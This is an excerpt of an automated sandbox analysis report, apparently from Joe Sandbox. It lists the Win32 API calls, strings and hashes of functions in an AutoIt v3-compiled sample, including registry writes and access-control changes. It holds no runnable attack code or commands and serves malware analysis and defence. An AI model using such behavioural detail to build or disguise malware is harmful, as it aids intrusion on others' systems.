                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 001B3369
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001B33B2
                                                                                                                                                                                                                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001B33C1
                                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 001B33D1
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 001B33D5
                                                                                                                                                                                                                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001B33E5
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001B33EE
                                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 001B33F7
                                                                                                                                                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001B3423
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 001B343A
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 001B347A
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001B348E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 001B349F
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001B34D4
                                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 001B34DF
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001B34EA
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001B34F4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                                          • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                                          • Opcode ID: ffb2a3e0f922fe1f27249269c92ee58bfcbba53cf4f84dc8d9b3219a5d752d5e
                                                                                                                                                                                                                                                                                                          • Instruction ID: c31756b854db5707c3d2436718f6cfa4f0e9db766db5935ab3aee89d3bfe3a26
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffb2a3e0f922fe1f27249269c92ee58bfcbba53cf4f84dc8d9b3219a5d752d5e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61B15071A00215AFEB14DFA8DC49FAEBBB9EB48710F008159FA15E7291DB74ED40CB94
                                                                                                                                                                                                                                                                                                          Function 001A5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 001A5532
                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,001CDC30,?,\\.\,001CDCD0), ref: 001A560F
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,001CDC30,?,\\.\,001CDCD0), ref: 001A577B
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                                          • Opcode ID: c2ef234d9c257a06a5e1dec1bc3fa45078e39d012c3df19ec9db5fc52681f8f3
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5d35fa14d58eb2180280f2f48f6e0e44a9dfe6c49013a8e1090ff25f91b1bcef
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2ef234d9c257a06a5e1dec1bc3fa45078e39d012c3df19ec9db5fc52681f8f3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5610638A0CA09DFC728DFA4C992D7877B3EF26364BA58015E40ABB292D731DD41DB51
                                                                                                                                                                                                                                                                                                          Function 00132521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001325F8
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00132600
                                                                                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013262B
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00132633
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00132658
                                                                                                                                                                                                                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00132675
                                                                                                                                                                                                                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00132685
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001326B8
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001326CC
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 001326EA
                                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00132706
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00132711
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetCursorPos.USER32(?), ref: 001319E1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: ScreenToClient.USER32(00000000,?), ref: 001319FE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetAsyncKeyState.USER32(00000001), ref: 00131A23
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetAsyncKeyState.USER32(00000002), ref: 00131A3D
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,0013199C), ref: 00132738
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                                          • String ID: <) $<) $AutoIt v3 GUI$( $( $(
                                                                                                                                                                                                                                                                                                          • API String ID: 1458621304-1979737201
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4a551474191f284590729e429517636dca1c15fa78916af0d26e1cf6af108429
                                                                                                                                                                                                                                                                                                          • Instruction ID: b2b4fb8801cb5a96b03a6d4e299fbbb1cf3501a0194c488de252b0df6d7efe71
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a551474191f284590729e429517636dca1c15fa78916af0d26e1cf6af108429
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71B15C35A00209DFDB14DFA8DC89FAE7BB5FB48314F118229FA19A7290D774E940CB51
                                                                                                                                                                                                                                                                                                          Function 001C1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 001C1BC4
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001C1BD9
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001C1BE0
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C1C35
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 001C1C55
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001C1C89
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001C1CA7
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001C1CB9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 001C1CCE
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 001C1CE1
                                                                                                                                                                                                                                                                                                          • IsWindowVisible.USER32(00000000), ref: 001C1D3D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001C1D58
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001C1D6C
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 001C1D84
                                                                                                                                                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 001C1DAA
                                                                                                                                                                                                                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 001C1DC4
                                                                                                                                                                                                                                                                                                          • CopyRect.USER32(?,?), ref: 001C1DDB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 001C1E46
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                                          • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                                          • Opcode ID: ace2f21e5a4613b74082875ed97fecc85614e67feed8cea8fd5b7c25edc60534
                                                                                                                                                                                                                                                                                                          • Instruction ID: a714d1a45a11eacaf14a47cbf57efb79a0e06a6190815d63e1e5e5a6deb30e76
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ace2f21e5a4613b74082875ed97fecc85614e67feed8cea8fd5b7c25edc60534
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1B16971648301AFD714DF64C984F6ABBE5FFA5314F00891CF9999B2A2CB31E844CB92
                                                                                                                                                                                                                                                                                                          Function 001C0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 001C0D81
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C0DBB
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C0E25
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C0E8D
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C0F11
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001C0F61
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001C0FA0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014FD52: _wcslen.LIBCMT ref: 0014FD5D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00192BA5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00192BD7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                                          • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                                          • Opcode ID: bbe344b9aa1fddfd91a460c9c7d66b59f4cb6b81c410465070619befcfe41227
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0faf19633a3d7027089e9cf50f1b2fc5ace1ba5d6f80ed96124b0d98c25961e8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbe344b9aa1fddfd91a460c9c7d66b59f4cb6b81c410465070619befcfe41227
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFE19B312083419FCB14DF28C951A6AB3E6BFA9314F15496CF8969B2A2DB30ED45CB91
                                                                                                                                                                                                                                                                                                          Function 001916D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00191A60
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A6C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A7B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A82
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00191A99
                                                                                                                                                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00191741
                                                                                                                                                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00191775
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0019178C
                                                                                                                                                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 001917C6
                                                                                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001917E2
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 001917F9
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00191801
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00191808
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00191829
                                                                                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00191830
                                                                                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0019185F
                                                                                                                                                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00191881
                                                                                                                                                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00191893
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001918BA
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001918C1
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001918CA
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001918D1
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001918DA
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001918E1
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001918ED
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001918F4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191ADF: GetProcessHeap.KERNEL32(00000008,001914FD,?,00000000,?,001914FD,?), ref: 00191AED
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,001914FD,?), ref: 00191AF4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001914FD,?), ref: 00191B03
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5546c8aaa33a826313ab3ceed6219183b49d7e4447cd56d640ddb026f2d4e93f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 69bda960c7ea4a7d09f3eeb870003d3829e19ce9a88e57d130bd9cc7b250ac14
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5546c8aaa33a826313ab3ceed6219183b49d7e4447cd56d640ddb026f2d4e93f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B67137B2D0020ABBDF109FA5EC49FAEBBB9BF44710F154125F915A6290D731DA85CB60
                                                                                                                                                                                                                                                                                                          Function 001BCE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001BCF1D
                                                                                                                                                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,001CDCD0,00000000,?,00000000,?,?), ref: 001BCFA4
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 001BD004
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BD054
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BD0CF
                                                                                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 001BD112
                                                                                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 001BD221
                                                                                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 001BD2AD
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 001BD2E1
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001BD2EE
                                                                                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 001BD3C0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                                          • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                                          • Opcode ID: b8dd1747331014773d1f3fe6f2a9c22f7eea8290b8325f4eea0aa36b9621f6ba
                                                                                                                                                                                                                                                                                                          • Instruction ID: 11dad9b51f89bfbab8b7892638aeb6f72fd0e0a3af8c515491b627511242417b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8dd1747331014773d1f3fe6f2a9c22f7eea8290b8325f4eea0aa36b9621f6ba
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9125A756042019FDB18DF24C881A6AB7F5FF98714F0488ACF95A9B3A2DB31ED41CB81
                                                                                                                                                                                                                                                                                                          Function 001C13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 001C1462
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C149D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001C14F0
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C1526
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C15A2
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C161D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014FD52: _wcslen.LIBCMT ref: 0014FD5D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00193535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00193547
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
